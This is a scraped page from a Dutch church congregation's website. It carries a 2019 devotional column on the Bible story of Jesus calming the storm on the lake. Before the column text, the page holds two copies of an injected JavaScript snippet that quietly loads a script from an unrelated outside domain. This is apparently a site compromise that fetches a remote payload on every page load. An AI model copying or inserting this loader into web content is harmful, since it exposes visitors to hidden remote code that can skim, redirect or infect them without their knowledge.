;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Zwijg, wees stil - PKN Damwâld

Zwijg, wees stil

Gepubliceerd op: donderdag 25 april 2019

Heel veel mensen hebben een Bijbelgedeelte of een Bijbeltekst die hun meer aanspreekt dan andere gedeelten. Soms is dat zelfs wisselend, de ene keer spreekt dit Bijbelgedeelte, dan soms dat gedeelte je meer aan. Dat hangt soms af van de omstandigheden hoe je je op dat moment voelt of in welke situatie je verkeert.
Een Bijbelgedeelte dat veel mensen aanspreekt is het verhaal dat bekend staat als: ‘de storm op het meer’. Het verhaal vertelt dat Jezus met een aantal van zijn discipelen op het meer is en dat terwijl Jezus rustig slaapt er een hevige stormwind opsteekt. De discipelen vrezen dat zij zullen verdrinken en zij verbazen zich erover dat Jezus zo rustig kan slapen. Wanneer ze Hem wakker maken en hun zorgen aan Hem meedelen wordt hun verwondering en bewondering voor Jezus groter dan die al was. Jezus beveelt de wind te gaan liggen en dit gebeurt dan direct. De discipelen zijn diep onder de indruk en vragen zich verwonderd af wie Hij wel is. ‘Wie is toch deze ?’ is hun vraag aan elkaar.
Kent u het lied: ‘Meester de stormwind giert woedend’? In dit lied wordt verteld over dit verhaal.
Als het gezongen worden hoor je als het ware de kracht van de storm en het gebulder van het water.
Ook voel je angst van de discipelen. Maar op hun vraag ‘wie is toch deze’? komt het geruststellende antwoord dat zich aan boord van hun schip ‘de Meester van zee, aard en wind’ bevindt.
Hij spreekt de elementen toe en op Zijn bevel zijn zij stil en zwijgen. Als Jezus spreekt worden alle andere stemmen die het op Hem hebben voorzien tot zwijgen gebracht.

Columnist:Wessel

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns